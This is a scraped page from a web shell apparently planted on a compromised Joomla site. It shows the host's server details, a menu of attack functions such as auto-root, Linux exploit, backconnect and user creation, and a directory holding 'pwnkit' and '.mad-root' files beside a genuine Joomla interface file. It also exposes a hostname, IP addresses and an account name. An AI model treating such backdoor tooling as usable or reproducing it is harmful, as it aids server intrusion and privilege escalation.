Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
libraries /
src /
MVC /
Model /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
AdminModel.php
41.6
KB
-rw----r--
BaseDatabaseModel.php
8.14
KB
-rw----r--
BaseModel.php
3.16
KB
-rw----r--
DatabaseAwareTrait.php
1.03
KB
-rw----r--
DatabaseModelInterface.php
558
B
-rw----r--
FormBehaviorTrait.php
4.92
KB
-rw----r--
FormModel.php
6.04
KB
-rw----r--
FormModelInterface.php
730
B
-rw----r--
ItemModel.php
1.05
KB
-rw----r--
ItemModelInterface.php
563
B
-rw----r--
LegacyModelLoaderTrait.php
4.64
KB
-rw----r--
ListModel.php
18.22
KB
-rw----r--
ListModelInterface.php
547
B
-rw----r--
ModelInterface.php
531
B
-rw----r--
StateBehaviorTrait.php
2.13
KB
-rw----r--
StatefulModelInterface.php
1.03
KB
-rw----r--
WorkflowBehaviorTrait.php
9.28
KB
-rw----r--
WorkflowModelInterface.php
2.98
KB
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : WorkflowModelInterface.php
<?php /** * Joomla! Content Management System * * @copyright (C) 2020 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ namespace Joomla\CMS\MVC\Model; use Joomla\CMS\Form\Form; use Joomla\CMS\Table\Table; \defined('JPATH_PLATFORM') or die; /** * Interface for a workflow model. * * @since 4.0.0 */ interface WorkflowModelInterface { /** * Set Up the workflow * * @param string $extension The option and section separated by. * * @return void * * @since 4.0.0 */ public function setUpWorkflow($extension); /** * Method to allow derived classes to preprocess the form. * * @param Form $form A Form object. * @param mixed $data The data expected for the form. * * @return void * * @see FormField * @since 4.0.0 * @throws \Exception if there is an error in the form event. */ public function workflowPreprocessForm(Form $form, $data); /** * Let plugins access stage change events * * @return void * * @since 4.0.0 */ public function workflowBeforeStageChange(); /** * Preparation of workflow data/plugins * * @return void * * @since 4.0.0 */ public function workflowBeforeSave(); /** * Executing of relevant workflow methods * * @return void * * @since 4.0.0 */ public function workflowAfterSave($data); /** * Batch change workflow stage or current. * * @param integer $oldId The ID of the item copied from * @param integer $newId The ID of the new item * * @return null * * @since 4.0.0 */ public function workflowCleanupBatchMove($oldId, $newId); /** * Runs transition for item. * * @param array $pks Id of items to execute the transition * @param integer $transitionId Id of transition * * @return boolean * * @since 4.0.0 */ public function executeTransition(array $pks, int $transitionId); /** * Method to get state variables. * * @param string $property Optional parameter name * @param mixed $default Optional default value * * @return mixed The property where specified, the state object where omitted * * @since 4.0.0 */ public function getState($property = null, $default = null); /** * Method to get the model name * * The model name. By default parsed using the classname or it can be set * by passing a $config['name'] in the class constructor * * @return string The name of the model * * @since 4.0.0 * @throws \Exception */ public function getName(); /** * Method to get a table object, load it if necessary. * * @param string $name The table name. Optional. * @param string $prefix The class prefix. Optional. * @param array $options Configuration array for model. Optional. * * @return Table A Table object * * @since 3.0 * @throws \Exception */ public function getTable($name = '', $prefix = '', $options = array()); }
Close